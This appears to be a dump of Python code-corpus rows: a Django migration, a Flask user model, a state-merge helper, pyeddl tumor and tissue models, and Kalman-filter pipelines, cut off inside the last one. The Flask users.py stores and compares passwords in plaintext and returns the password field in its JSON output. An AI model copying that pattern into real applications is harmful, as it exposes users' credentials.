('sender', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='holvi_webshops', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='HolviPurchaseAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('label', models.CharField(max_length=128)),
('answer', models.CharField(max_length=256)),
('purchase', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='answers', to='holvi_orders.HolviPurchase')),
],
),
migrations.AddField(
model_name='holviorder',
name='shop',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='orders', to='holvi_orders.HolviWebshop'),
),
] | 0.533641 | 0.120698 |
from app.setup import db, msmlw
from datetime import datetime
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), nullable=False)
password = db.Column(db.String(255), nullable=False)
created_at = db.Column(db.DateTime, nullable=False, default=datetime.now)
updated_at = db.Column(db.DateTime, nullable=False, default=datetime.now, onupdate=datetime.now)
def __repr__(self):
return '<User %r>' % self.name
class UserSchema(msmlw.SQLAlchemySchema):
class Meta:
model = User
fields = ('id', 'name', 'password')
class UserOperater():
def __init__(self):
self.user_schema = UserSchema()
self.users_schema = UserSchema(many=True)
def getUserList(self):
# select * from users
user_list = db.session.query(User).all()
if user_list == None:
return []
else:
return self.user_schema.jsonify(user_list)
def getUser(self, user):
# select * from users where name=${user.name}
result = db.session.query(User).filter_by(name=user['name']).first()
if result == None:
return []
else:
return self.user_schema.jsonify(result).json
def getUserFromID(self, aId):
result = db.session.query(User).filter_by(id=aId).first()
if result == None:
return []
else:
return self.user_schema.jsonify(result).json
def isExistUser(self, user):
# select * from users where name=${user.name}
result = db.session.query(User).filter_by(name=user['name']).first()
if result == None:
return False
else:
return True
def isUnAuthUser(self, user):
# select * from users where name=${user.name} password=${<PASSWORD>}
result = db.session.query(User).filter_by(
name=user['name'], password=user['password']).first()
if result == None:
return True
else:
return False
def registUser(self, user):
record = User(
name = user['name'],
password = user['password']
)
# insert into users(name, password) values(...)
db.session.add(record)
db.session.commit()
return self.user_schema.jsonify(record) | docker/flask/app/app/model/users.py | from app.setup import db, msmlw
from datetime import datetime
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(255), nullable=False)
password = db.Column(db.String(255), nullable=False)
created_at = db.Column(db.DateTime, nullable=False, default=datetime.now)
updated_at = db.Column(db.DateTime, nullable=False, default=datetime.now, onupdate=datetime.now)
def __repr__(self):
return '<User %r>' % self.name
class UserSchema(msmlw.SQLAlchemySchema):
class Meta:
model = User
fields = ('id', 'name', 'password')
class UserOperater():
def __init__(self):
self.user_schema = UserSchema()
self.users_schema = UserSchema(many=True)
def getUserList(self):
# select * from users
user_list = db.session.query(User).all()
if user_list == None:
return []
else:
return self.user_schema.jsonify(user_list)
def getUser(self, user):
# select * from users where name=${user.name}
result = db.session.query(User).filter_by(name=user['name']).first()
if result == None:
return []
else:
return self.user_schema.jsonify(result).json
def getUserFromID(self, aId):
result = db.session.query(User).filter_by(id=aId).first()
if result == None:
return []
else:
return self.user_schema.jsonify(result).json
def isExistUser(self, user):
# select * from users where name=${user.name}
result = db.session.query(User).filter_by(name=user['name']).first()
if result == None:
return False
else:
return True
def isUnAuthUser(self, user):
# select * from users where name=${user.name} password=${<PASSWORD>}
result = db.session.query(User).filter_by(
name=user['name'], password=user['password']).first()
if result == None:
return True
else:
return False
def registUser(self, user):
record = User(
name = user['name'],
password = user['password']
)
# insert into users(name, password) values(...)
db.session.add(record)
db.session.commit()
return self.user_schema.jsonify(record) | 0.437103 | 0.071397 |
import os
import logger
from utils import dict_from_file
def state_helper(def_state: dict, path: dict, log) -> tuple:
no_ini = not os.path.isfile(path['settings'])
no_state = not os.path.isfile(path['state'])
if no_state and no_ini:
return def_state, True, True
ini_version, merge, state_save = 0, 0, True
if not no_state:
try:
state = dict_from_file(path['state'])
ini_version = state['system']['ini_version']
merge = state['system']['merge']
except RuntimeError as e:
log('Broken {}, reset'.format(path['state']), logger.WARN)
state = def_state
else:
state['system'] = def_state['system']
else:
state = def_state
m = _Merge(merge, state, path, log)
state_save = ini_version != m.state['system']['ini_version']
return m.state, m.state['system']['ini_version'] > ini_version, state_save or m.state_save
class _Merge:
def __init__(self, start: int, state: dict, path: dict, log):
self.state_save = False
self.state = state
self.path = path
end = state['system']['merge']
for merge in range(start + 1, end + 1):
name = 'merge_{}'.format(merge)
if hasattr(self, name):
msg = 'Merge {} ... '.format(merge)
try:
getattr(self, name)()
except Exception as e:
log('{}{}'.format(msg, e), logger.ERROR)
else:
log('{}{}'.format(msg, 'ok'))
self.state_save = True
def merge_1(self):
for key in ('backup', 'update'):
file_path = os.path.join(self.path['data'], key + '.json')
if os.path.isfile(file_path):
data = dict_from_file(file_path)
os.remove(file_path)
if data and isinstance(data, dict):
if key == 'update':
key = 'updater'
self.state[key] = data | src/lib/state_helper.py | import os
import logger
from utils import dict_from_file
def state_helper(def_state: dict, path: dict, log) -> tuple:
no_ini = not os.path.isfile(path['settings'])
no_state = not os.path.isfile(path['state'])
if no_state and no_ini:
return def_state, True, True
ini_version, merge, state_save = 0, 0, True
if not no_state:
try:
state = dict_from_file(path['state'])
ini_version = state['system']['ini_version']
merge = state['system']['merge']
except RuntimeError as e:
log('Broken {}, reset'.format(path['state']), logger.WARN)
state = def_state
else:
state['system'] = def_state['system']
else:
state = def_state
m = _Merge(merge, state, path, log)
state_save = ini_version != m.state['system']['ini_version']
return m.state, m.state['system']['ini_version'] > ini_version, state_save or m.state_save
class _Merge:
def __init__(self, start: int, state: dict, path: dict, log):
self.state_save = False
self.state = state
self.path = path
end = state['system']['merge']
for merge in range(start + 1, end + 1):
name = 'merge_{}'.format(merge)
if hasattr(self, name):
msg = 'Merge {} ... '.format(merge)
try:
getattr(self, name)()
except Exception as e:
log('{}{}'.format(msg, e), logger.ERROR)
else:
log('{}{}'.format(msg, 'ok'))
self.state_save = True
def merge_1(self):
for key in ('backup', 'update'):
file_path = os.path.join(self.path['data'], key + '.json')
if os.path.isfile(file_path):
data = dict_from_file(file_path)
os.remove(file_path)
if data and isinstance(data, dict):
if key == 'update':
key = 'updater'
self.state[key] = data | 0.210604 | 0.175432 |
import logging
import os
from abc import ABC
from dataclasses import dataclass
from typing import List
import numpy as np
import onnx
import pyeddl.eddl as eddl
import stringcase
from pyeddl.tensor import Tensor
from slaid.commons.base import ImageInfo
from slaid.models import Factory as BaseFactory
from slaid.models import Model as BaseModel
logger = logging.getLogger('eddl-models')
fh = logging.FileHandler('/tmp/eddl.log')
logger.addHandler(fh)
class Model(BaseModel, ABC):
patch_size = None
default_image_info = ImageInfo(
ImageInfo.ColorType.BGR,
ImageInfo.Coord.YX,
ImageInfo.Channel.FIRST,
)
index_prediction = 1
def __init__(self,
net: eddl.Model,
weight_filename: str = None,
gpu: List = None,
image_info: ImageInfo = None,
name: str = None):
self._net = net
self._weight_filename = weight_filename
self._gpu = gpu
self.image_info = image_info or self.default_image_info
super().__init__(name)
@property
def weight_filename(self):
return self._weight_filename
def __str__(self):
return self.name
@property
def gpu(self) -> List:
return self._gpu
@property
def net(self):
return self._net
def predict(self, array: np.ndarray) -> np.ndarray:
predictions = self._predict(array)
temp_mask = []
for prob_T in predictions:
output_np = prob_T.getdata()
temp_mask.append(output_np[:, self.index_prediction])
flat_mask = np.vstack(temp_mask).flatten()
return flat_mask
def _predict(self, array: np.ndarray) -> List[Tensor]:
tensor = Tensor.fromarray(array)
prediction = eddl.predict(self._net, [tensor])
return prediction
class TissueModel(Model):
index_prediction = 1
default_image_info = ImageInfo(ImageInfo.ColorType.RGB, ImageInfo.Coord.YX,
ImageInfo.Channel.LAST,
ImageInfo.Range._0_255)
@staticmethod
def create_net():
in_ = eddl.Input([3])
layer = in_
layer = eddl.ReLu(eddl.Dense(layer, 50))
layer = eddl.ReLu(eddl.Dense(layer, 50))
layer = eddl.ReLu(eddl.Dense(layer, 50))
out = eddl.Softmax(eddl.Dense(layer, 2))
net = eddl.Model([in_], [out])
return net
class TumorModel(Model):
patch_size = (256, 256)
index_prediction = 1
default_image_info = ImageInfo(ImageInfo.ColorType.BGR, ImageInfo.Coord.YX,
ImageInfo.Channel.FIRST,
ImageInfo.Range._0_1)
@staticmethod
def create_net():
in_size = [256, 256]
num_classes = 2
in_ = eddl.Input([3, in_size[0], in_size[1]])
out = TumorModel._create_VGG16(in_, num_classes)
net = eddl.Model([in_], [out])
return net
@staticmethod
def _create_VGG16(in_layer, num_classes, seed=1234, init=eddl.HeNormal):
x = in_layer
x = eddl.ReLu(init(eddl.Conv(x, 64, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 64, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 128, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 128, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed)),
[2, 2], [2, 2])
x = eddl.Reshape(x, [-1])
x = eddl.ReLu(init(eddl.Dense(x, 256), seed))
x = eddl.Softmax(eddl.Dense(x, num_classes))
return x
def to_onnx(model: Model, filename: str):
eddl.save_net_to_onnx_file(model.net, filename)
@dataclass
class Factory(BaseFactory):
filename: str
cls_name: str = None
gpu: List[int] = None
learn_rate = 1e-5
list_of_losses: List[str] = None
list_of_metrics: List[str] = None
def __post_init__(self):
self.list_of_losses = self.list_of_losses or ["soft_cross_entropy"]
self.list_of_metrics = self.list_of_metrics or ["categorical_accuracy"]
def get_model(self):
cls_name = self._get_cls_name()
cls = globals()[cls_name]
net = cls.create_net()
self._build_net(net)
eddl.load(net, self.filename, "bin")
return globals()[cls_name](net, name=os.path.basename(self.filename))
def _build_net(self, net):
eddl.build(net,
eddl.rmsprop(self.learn_rate),
self.list_of_losses,
self.list_of_metrics,
eddl.CS_GPU(self.gpu, mem="low_mem")
if self.gpu else eddl.CS_CPU(),
init_weights=False)
def _get_cls_name(self):
if self.cls_name:
cls_name = self.cls_name
else:
basename = os.path.basename(self.filename)
cls_name = basename.split('-')[0]
cls_name = stringcase.capitalcase(stringcase.camelcase(cls_name))
return cls_name
@dataclass
class OnnxFactory(Factory):
def get_model(self):
net = eddl.import_net_from_onnx_file(self.filename)
self._build_net(net)
cls_name = self._get_cls_name()
cls = globals()[cls_name]
image_info = self._update_image_info(cls.default_image_info)
return cls(net,
image_info=image_info,
name=os.path.basename(self.filename))
def _update_image_info(self, image_info: ImageInfo) -> ImageInfo:
image_info = ImageInfo(color_type=image_info.color_type,
coord=image_info.coord,
channel=image_info.channel,
pixel_range=image_info.pixel_range)
onnx_model = onnx.load(self.filename)
for prop in onnx_model.metadata_props:
if prop.key == "Image.BitmapPixelFormat":
color_type = prop.value[:3].lower()
image_info.color_type = ImageInfo.ColorType(color_type)
if prop.key == "Image.NominalPixelRange":
pixel_range = prop.value.split('_', 1)[1]
image_info.pixel_range = ImageInfo.Range(pixel_range)
return image_info | slaid/models/eddl.py | import logging
import os
from abc import ABC
from dataclasses import dataclass
from typing import List
import numpy as np
import onnx
import pyeddl.eddl as eddl
import stringcase
from pyeddl.tensor import Tensor
from slaid.commons.base import ImageInfo
from slaid.models import Factory as BaseFactory
from slaid.models import Model as BaseModel
logger = logging.getLogger('eddl-models')
fh = logging.FileHandler('/tmp/eddl.log')
logger.addHandler(fh)
class Model(BaseModel, ABC):
    """Base class for pyeddl-backed inference models.

    Wraps an already-built eddl network and exposes :meth:`predict`,
    which returns the probability of the class at ``index_prediction``
    for every input row.
    """
    # Tile size the model expects; None means no fixed patch size.
    patch_size = None
    # Image layout the model was trained on; subclasses override this.
    default_image_info = ImageInfo(
        ImageInfo.ColorType.BGR,
        ImageInfo.Coord.YX,
        ImageInfo.Channel.FIRST,
    )
    # Column of the network output taken as the prediction (positive class).
    index_prediction = 1
    def __init__(self,
                 net: eddl.Model,
                 weight_filename: str = None,
                 gpu: List = None,
                 image_info: ImageInfo = None,
                 name: str = None):
        """Store the network and its metadata.

        Args:
            net: built eddl network used for inference.
            weight_filename: path of the weight file the net came from.
            gpu: eddl GPU mask; None means CPU.
            image_info: input layout; defaults to ``default_image_info``.
            name: human-readable model name, forwarded to BaseModel.
        """
        self._net = net
        self._weight_filename = weight_filename
        self._gpu = gpu
        self.image_info = image_info or self.default_image_info
        super().__init__(name)
    @property
    def weight_filename(self):
        """Path of the weight file this model was created from (may be None)."""
        return self._weight_filename
    def __str__(self):
        return self.name
    @property
    def gpu(self) -> List:
        """GPU mask given at construction time (None means CPU)."""
        return self._gpu
    @property
    def net(self):
        """The wrapped eddl network."""
        return self._net
    def predict(self, array: np.ndarray) -> np.ndarray:
        """Run inference on *array* and return a flat 1-D probability array.

        For each output tensor, keeps only column ``index_prediction``.
        # NOTE(review): assumes each prediction tensor is 2-D
        # (rows, classes) — confirm against pyeddl's predict output.
        """
        predictions = self._predict(array)
        temp_mask = []
        for prob_T in predictions:
            output_np = prob_T.getdata()
            temp_mask.append(output_np[:, self.index_prediction])
        flat_mask = np.vstack(temp_mask).flatten()
        return flat_mask
    def _predict(self, array: np.ndarray) -> List[Tensor]:
        """Convert *array* to an eddl Tensor and run the network on it."""
        tensor = Tensor.fromarray(array)
        prediction = eddl.predict(self._net, [tensor])
        return prediction
class TissueModel(Model):
    """Pixel-wise tissue classifier: a small dense net over RGB triples."""
    # Probability column of the "tissue" class.
    index_prediction = 1
    default_image_info = ImageInfo(ImageInfo.ColorType.RGB, ImageInfo.Coord.YX,
                                   ImageInfo.Channel.LAST,
                                   ImageInfo.Range._0_255)
    @staticmethod
    def create_net():
        """Build the untrained 3-input / 2-class dense network."""
        in_ = eddl.Input([3])
        layer = in_
        # Three hidden dense layers of 50 units, ReLU activations.
        layer = eddl.ReLu(eddl.Dense(layer, 50))
        layer = eddl.ReLu(eddl.Dense(layer, 50))
        layer = eddl.ReLu(eddl.Dense(layer, 50))
        out = eddl.Softmax(eddl.Dense(layer, 2))
        net = eddl.Model([in_], [out])
        return net
class TumorModel(Model):
    """Patch-level tumor classifier: VGG16-style CNN on 256x256 BGR patches."""
    patch_size = (256, 256)
    # Probability column of the "tumor" class.
    index_prediction = 1
    default_image_info = ImageInfo(ImageInfo.ColorType.BGR, ImageInfo.Coord.YX,
                                   ImageInfo.Channel.FIRST,
                                   ImageInfo.Range._0_1)
    @staticmethod
    def create_net():
        """Build the untrained VGG16 network (3x256x256 input, 2 classes)."""
        in_size = [256, 256]
        num_classes = 2
        in_ = eddl.Input([3, in_size[0], in_size[1]])
        out = TumorModel._create_VGG16(in_, num_classes)
        net = eddl.Model([in_], [out])
        return net
    @staticmethod
    def _create_VGG16(in_layer, num_classes, seed=1234, init=eddl.HeNormal):
        """Stack the VGG16 conv/pool blocks and a dense head onto *in_layer*."""
        x = in_layer
        # Block 1: 64 filters.
        x = eddl.ReLu(init(eddl.Conv(x, 64, [3, 3]), seed))
        x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 64, [3, 3]), seed)),
                         [2, 2], [2, 2])
        # Block 2: 128 filters.
        x = eddl.ReLu(init(eddl.Conv(x, 128, [3, 3]), seed))
        x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 128, [3, 3]), seed)),
                         [2, 2], [2, 2])
        # Block 3: 256 filters.
        x = eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed))
        x = eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed))
        x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 256, [3, 3]), seed)),
                         [2, 2], [2, 2])
        # Blocks 4 and 5: 512 filters.
        x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
        x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
        x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed)),
                         [2, 2], [2, 2])
        x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
        x = eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed))
        x = eddl.MaxPool(eddl.ReLu(init(eddl.Conv(x, 512, [3, 3]), seed)),
                         [2, 2], [2, 2])
        # Flatten and classify.
        x = eddl.Reshape(x, [-1])
        x = eddl.ReLu(init(eddl.Dense(x, 256), seed))
        x = eddl.Softmax(eddl.Dense(x, num_classes))
        return x
def to_onnx(model: Model, filename: str):
    """Serialize *model*'s network to an ONNX file at *filename*."""
    eddl.save_net_to_onnx_file(model.net, filename)
@dataclass
class Factory(BaseFactory):
    """Factory that builds a :class:`Model` from a binary eddl weight file.

    The concrete Model subclass is resolved by name: either ``cls_name``
    or the part of the file name before the first ``-``, camel-cased.
    """
    filename: str
    cls_name: str = None
    gpu: List[int] = None
    # No annotation: plain class attribute, not a dataclass field.
    learn_rate = 1e-5
    list_of_losses: List[str] = None
    list_of_metrics: List[str] = None
    def __post_init__(self):
        # Fall back to the default loss/metric when none were given.
        self.list_of_losses = self.list_of_losses or ["soft_cross_entropy"]
        self.list_of_metrics = self.list_of_metrics or ["categorical_accuracy"]
    def get_model(self):
        """Create the net, build it, load the weights and wrap it in a Model."""
        cls_name = self._get_cls_name()
        cls = globals()[cls_name]
        net = cls.create_net()
        self._build_net(net)
        eddl.load(net, self.filename, "bin")
        # Reuse the class resolved above instead of a second globals()
        # lookup (consistent with OnnxFactory.get_model).
        return cls(net, name=os.path.basename(self.filename))
    def _build_net(self, net):
        """Build *net* on GPU when a mask was given, otherwise on CPU."""
        eddl.build(net,
                   eddl.rmsprop(self.learn_rate),
                   self.list_of_losses,
                   self.list_of_metrics,
                   eddl.CS_GPU(self.gpu, mem="low_mem")
                   if self.gpu else eddl.CS_CPU(),
                   init_weights=False)
    def _get_cls_name(self):
        """Return the Model subclass name, derived from the file name if unset."""
        if self.cls_name:
            cls_name = self.cls_name
        else:
            basename = os.path.basename(self.filename)
            cls_name = basename.split('-')[0]
            cls_name = stringcase.capitalcase(stringcase.camelcase(cls_name))
        return cls_name
@dataclass
class OnnxFactory(Factory):
    def get_model(self):
        """Import the ONNX file and wrap it in the matching Model subclass.

        The subclass is resolved from ``cls_name`` / the file name, and its
        default image info is overridden by any image metadata found in the
        ONNX file (see ``_update_image_info``).
        """
        net = eddl.import_net_from_onnx_file(self.filename)
        self._build_net(net)
        cls_name = self._get_cls_name()
        cls = globals()[cls_name]
        image_info = self._update_image_info(cls.default_image_info)
        return cls(net,
                   image_info=image_info,
                   name=os.path.basename(self.filename))
def _update_image_info(self, image_info: ImageInfo) -> ImageInfo:
image_info = ImageInfo(color_type=image_info.color_type,
coord=image_info.coord,
channel=image_info.channel,
pixel_range=image_info.pixel_range)
onnx_model = onnx.load(self.filename)
for prop in onnx_model.metadata_props:
if prop.key == "Image.BitmapPixelFormat":
color_type = prop.value[:3].lower()
image_info.color_type = ImageInfo.ColorType(color_type)
if prop.key == "Image.NominalPixelRange":
pixel_range = prop.value.split('_', 1)[1]
image_info.pixel_range = ImageInfo.Range(pixel_range)
return image_info | 0.745954 | 0.364495 |
import numpy as np
from kalman_estimation import (Kalman4ARX, Kalman4FROLS, Selector, get_mat_data, get_terms_matrix, get_txt_data, make_func4K4FROLS, make_linear_func,
plot_term_ERR, save_3Darray, torch4FROLS, update_condidate_terms, save_2Darray)
def update_terms(data_root='data/', data_type_set=('linear', 'nonlinear', 'longlag_linear', 'longlag_nonlinear')):
    """Update the candidate-term files for every data type.

    Args:
        data_root (str): root directory of the stored data files.
        data_type_set (iterable of str, optional): data-type names to
            process. The default is now an immutable tuple instead of the
            original mutable set literal (avoids the mutable-default-argument
            pitfall; iteration behavior is unchanged).
    """
    for data_type in data_type_set:
        update_condidate_terms(f'{data_root}{data_type}_terms.mat', f'{data_root}{data_type}_candidate_terms.txt')
def get_json_data(fname):
    """Load and return JSON data from file *fname*.

    Args:
        fname (str): path of the file holding the JSON data.

    Returns:
        The deserialized JSON content.
    """
    import ujson
    # Context manager closes the handle deterministically; the original
    # leaked the file object returned by open().
    with open(fname, 'r') as f:
        return ujson.load(f)
def kalman4ARX_pipeline(data_type, configs, n_trial):
    """Run the Kalman4ARX estimation pipeline over *n_trial* trials.

    types = ['linear', 'longlag_linear']
    Args:
        data_type: kind of data set ('linear' or 'longlag_linear')
        configs (dict): configuration dictionary, keyed by data_type
        n_trial: number of trials to run
    """
    config = configs[data_type]
    # 25 coefficient columns for the linear data set, 50 for long-lag.
    # NOTE(review): the buffer is sized for exactly 100 trials — assumes
    # n_trial <= 100; verify against callers.
    if data_type == 'linear':
        y_coef100 = np.zeros((100, 5, 25))
    else:
        y_coef100 = np.zeros((100, 5, 50))
    for trial in range(n_trial):
        term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
        terms_set = term_selector.make_terms()
        # get data
        normalized_signals = term_selector.make_selection()[0]
        fname = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}{trial+1}.txt"
        print(f'data_type: {data_type}, trial: ### {trial+1}')
        # Build the Kalman filter
        kf = Kalman4ARX(normalized_signals, config['max_lag'], uc=config['uc'])
        # Estimate the coefficients
        y_coef, A_coef = kf.estimate_coef(config['threshold'])
        y_coef100[trial] = y_coef
        # Build the model expression and save it to fname
        est_model = make_linear_func(A_coef, fname=fname)
        # Print the result
        # print(est_model)
    fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}log.txt"
    save_3Darray(fname1, y_coef100)
    # Mean and variance of the coefficients over all trials.
    mean_y = np.mean(y_coef100, 0)
    var_y = np.var(y_coef100, 0)
    print(mean_y, var_y, sep='\n')
    fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}log100.txt"
    save_3Darray(fname1, np.array([mean_y, var_y]))
def kalman4FROLS_pipeline(data_type, configs, n_trial, id_correct, n_correct):
    """Run the Kalman4FROLS estimation pipeline over *n_trial* trials.

    Args:
        data_type: kind of data set
        configs (dict): configuration dictionary, keyed by data_type
        n_trial: number of trials to run
        id_correct (dict): per data_type, the known-correct term ids
        n_correct: number of known-correct terms per signal row
    """
    config = configs[data_type]
    # NOTE(review): buffers are sized for 100 trials and 9 correct terms —
    # assumes n_trial <= 100 and sum(n_correct[:5]) == 9; verify callers.
    y_coef100 = np.zeros((100, 5, 5))
    y_coef9 = np.zeros((100, 9))
    for trial in range(n_trial):
        fname = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}{trial+1}.txt"
        term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
        terms_set = term_selector.make_terms()
        # get data
        normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection()
        print(f'data_type: {data_type}, trial: ### {trial+1}')
        # Build the Kalman filter
        kf = Kalman4FROLS(normalized_signals, Kalman_H=Kalman_H, uc=config['uc'])
        y_coef = kf.estimate_coef()
        y_coef100[trial] = y_coef
        est_model = make_func4K4FROLS(y_coef, candidate_terms, Kalman_S_No, fname=fname)
        coef9 = []
        # Collect the estimated coefficients of the known-correct terms.
        Kalman_S_No_order = np.sort(Kalman_S_No)
        for row in range(5):
            for t in range(n_correct[row]):
                idx = np.argwhere(Kalman_S_No_order[row, :] == id_correct[data_type][row][t])
                value = y_coef[row, idx]
                coef9.append(value[0, 0])
        y_coef9[trial] = np.array(coef9)
        # Print the result
        # print(est_model)
    fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}log.txt"
    save_3Darray(fname1, y_coef100)
    # Mean and variance of the correct-term coefficients over all trials.
    mean_y = np.mean(y_coef9, 0)
    var_y = np.var(y_coef9, 0)
    print(mean_y, var_y, sep='\n')
    fname1 = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}log100.txt"
    save_2Darray(fname1, np.array([mean_y, var_y]).T)
def torch4FROLS_pipeline(data_type, configs, n_trial, id_correct, n_correct):
"""基于 Kalman 滤波器的各个算法的 pipeline
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
y_coef100 = np.zeros((100, 5, 5))
y_coef9 = np.zeros((100, 9))
for trial in range(n_trial):
fname = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}{trial+1}.txt"
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection()
print(f'data_type: {data_type}, trial: ### {trial+1}')
kf = torch4FROLS(normalized_signals, Kalman_H=Kalman_H, n_epoch=config['n_epoch'])
y_coef = kf.estimate_coef()
print(kf.y_error, kf.y_error.shape)
y_coef100[trial] = y_coef
est_model = make_func4K4FROLS(y_coef, candidate_terms, Kalman_S_No, fname=fname)
coef9 = []
Kalman_S_No_order = np.sort(Kalman_S_No)
for row in range(5):
for t in range(n_correct[row]):
idx = np.argwhere(Kalman_S_No_order[row, :] == id_correct[data_type][row][t])
value = y_coef[row, idx]
coef9.append(value[0, 0])
y_coef9[trial] = np.array(coef9)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef9, 0)
var_y = np.var(y_coef9, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_torch4FROLS100_{config['est_fname']}log100.txt"
save_2Darray(fname1, np.array([mean_y, var_y]).T) | tools/core_tools1.py | import numpy as np
from kalman_estimation import (Kalman4ARX, Kalman4FROLS, Selector, get_mat_data, get_terms_matrix, get_txt_data, make_func4K4FROLS, make_linear_func,
plot_term_ERR, save_3Darray, torch4FROLS, update_condidate_terms, save_2Darray)
def update_terms(data_root='data/', data_type_set={'linear', 'nonlinear', 'longlag_linear', 'longlag_nonlinear'}):
"""update condidate terms
Args:
data_root (str): 数据存储根目录
data_type_set (set, optional): 数据类型集合,Defaults to {'linear', 'nonlinear', 'longlag_linear', 'longlag_nonlinear'}.
"""
for data_type in data_type_set:
update_condidate_terms(f'{data_root}{data_type}_terms.mat', f'{data_root}{data_type}_candidate_terms.txt')
def get_json_data(fname):
"""获取 JSON 数据
Args:
fname (str): 存储 JSON 数据的文件路径和文件名
"""
import ujson
return ujson.load(open(fname, 'r'))
def kalman4ARX_pipeline(data_type, configs, n_trial):
"""基于 Kalman 滤波器的各个算法的 pipeline
types = ['linear', 'longlag_linear']
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
if data_type == 'linear':
y_coef100 = np.zeros((100, 5, 25))
else:
y_coef100 = np.zeros((100, 5, 50))
for trial in range(n_trial):
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals = term_selector.make_selection()[0]
fname = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}{trial+1}.txt"
print(f'data_type: {data_type}, trial: ### {trial+1}')
# 构造 Kalman Filter
kf = Kalman4ARX(normalized_signals, config['max_lag'], uc=config['uc'])
# 估计系数
y_coef, A_coef = kf.estimate_coef(config['threshold'])
y_coef100[trial] = y_coef
# 计算模型表达式并保存
est_model = make_linear_func(A_coef, fname=fname)
# 输出结果
# print(est_model)
fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}log.txt"
save_3Darray(fname1, y_coef100)
mean_y = np.mean(y_coef100, 0)
var_y = np.var(y_coef100, 0)
print(mean_y, var_y, sep='\n')
fname1 = f"{config['data_root']}{data_type}_kalman4ARX100_{config['est_fname']}log100.txt"
save_3Darray(fname1, np.array([mean_y, var_y]))
def kalman4FROLS_pipeline(data_type, configs, n_trial, id_correct, n_correct):
"""基于 Kalman 滤波器的各个算法的 pipeline
Args:
data_type: 数据类型
configs (dict): 配置字典
n_trial: 试验次数
"""
config = configs[data_type]
y_coef100 = np.zeros((100, 5, 5))
y_coef9 = np.zeros((100, 9))
for trial in range(n_trial):
fname = f"{config['data_root']}{data_type}_kalman4FROLS100_{config['est_fname']}{trial+1}.txt"
term_selector = Selector(f"{config['data_root']}{data_type}{config['term_path']}{trial+1}.mat")
terms_set = term_selector.make_terms()
# get data
normalized_signals, Kalman_H, candidate_terms, Kalman_S_No = term_selector.make_selection()
print(f'data_type: {data_type}, trial: ### {trial+1}')
# 构造 Kalman Filter
kf = Kalman4FROLS(normalized_signals, Kalman_H=Kalman_H, uc=config['uc'])
y_coef = kf.estimate_coef()
y_coef100[trial] = y_coef
est_model = make_func4K4FROLS(y_coef, candidate_terms, Kalman_S_No, fname=fname)
coef9 = []
Kalman_S_No_order = np.sort(Kalman_S_No)
for row in range(5):
for t in range(n_correct[row]):
idx = np.argwhere(Kalman_S_No_order[row, :] == id_correct[data_type][row][t])
value = y_coef[row, idx]
coef9.append(value[0, 0])
y_coef9[trial] = np.array(coef9)
